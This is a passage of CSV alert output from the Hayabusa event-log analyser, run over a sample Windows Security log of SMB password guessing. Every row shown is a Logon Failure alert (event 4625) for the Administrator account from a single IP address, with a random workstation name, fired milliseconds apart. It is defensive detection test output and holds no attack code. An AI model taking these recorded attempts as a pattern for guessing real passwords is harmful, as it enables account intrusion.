NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.866 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sgzUk1Dmttm4AQ3s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.921 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Hp0c3YYyOSJuBHCR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gkis4H1MIQPHUwqf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.009 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Lb6mH03qKLb8O7Dz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J10xEmhRNWfJ5FCI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.093 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5Dujj8A7wwzAwzCp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NVDE3fIoUQfLn3cd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.175 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UlD48O0XpFUnuSmo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.213 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KyTPKuspADmLpv0L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.260 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BdIAPiH32ZbmCgTK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1dEiN2xOA4E9Wl5p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.337 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fBeAez2fLjXB0dk3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.372 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gQ45aeMDc3Snabvv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.420 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QWSYdr4lJlhCLMMW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.462 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RgxHY7072aUCdfa0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.504 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9yKhEodJDTVCGdIG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.597 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Z0odyPQmvkGRNWZF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.630 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b5uRpG0fxCK75DPV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.666 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: d9dcEzpJRW5YA8Bj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Hv3B9bwB1YIaBa6N : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.743 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lJf9Obml4aVxE5zp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mvnSOaRSkGU6Uf5q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.808 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JSAkZsZsv0SaLKaO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.847 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: r6rnM6QbwfbbrcGy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.888 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RX0GW7K5wdQJUx4Y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xm7CpD5i735McsvS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.959 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bHxjZsnR25J47Ez8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.999 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J1JWj91m79FyykH6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.043 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h9i0GncOzpz5REWp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.085 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BODZRJ6G3xxw29VJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.127 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SJ2lq4piINfmI7Qe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.167 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NqDeXdOitJ3WY8w4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.217 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FnoHQf7QDxoI4tel : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.261 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FqkbgrtBa5VFxPry : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TMD57GtY15bfWBre : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.350 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: e3lT9UgWr82PcAjf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.388 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SpwhTfFlvvccnI5N : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 10CfKdnvWf4UVuME : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.539 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YYLMax3okIqntHM1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.602 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qk9TPAK51EdVORwY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.670 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aVKRUnNu2nGslW7P : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZJ2AYRLcMbMVixg6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.759 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6Sl9ucxM2Nu3xjNq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AFeBGB6qA7OaYV7l : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.837 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KLUEKG9CzQYsH3Vp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.875 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vVZ44YKdRYY59zaC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.921 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: umU8pDDZFvvUVsHY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:19.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Nn7rA0uRegtHgaF1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2dgiakCKweT4GUGD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.039 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kptipiLujNVePYfy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.091 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: plaXJ1rEGpU3SzV2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.132 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I4pALF2luLfg36GC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.173 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZLO4cufbFcRhRy8b : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.215 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: a845OfrFKxy31Yhg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QnPM7uhs8y4BaP6I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7fW5FzQ4jbWDJxXc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.326 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: huKy3ruTPAlx94pI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.363 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: g78Kx7hkMuUGIoX1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.417 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: erSXtXvMi8Cg1PWw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.462 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VaqXgO2US87zoXLl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.501 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QHEfAfFuAR2pX3LO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.543 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4Owk2elGaC5DOm1U : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VXPynWzVNADN56a4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.619 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xwfwZ0hXFaFwqymH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QYlZwLsvrsuqUZ4q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.707 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pvGrzr30eVl5TGhA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.791 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tqdJcHWbdGcIIHBr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.840 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YDt69bIJ1yI6PXLg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.879 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WtE2uMuOe8QPAKOj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.911 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BWQDlZDgFj9NmMhJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:20.964 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ncQiyLyHCXr8knGa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.021 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XjVmLfmcPMYbmdin : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.072 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gU2HjzjDxHsnvENI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.103 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cUPn5CEz2LtwRwvZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.140 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hCz069oBFXqpshbU : IP Address: 192.168.198.149 : AuthPackage: 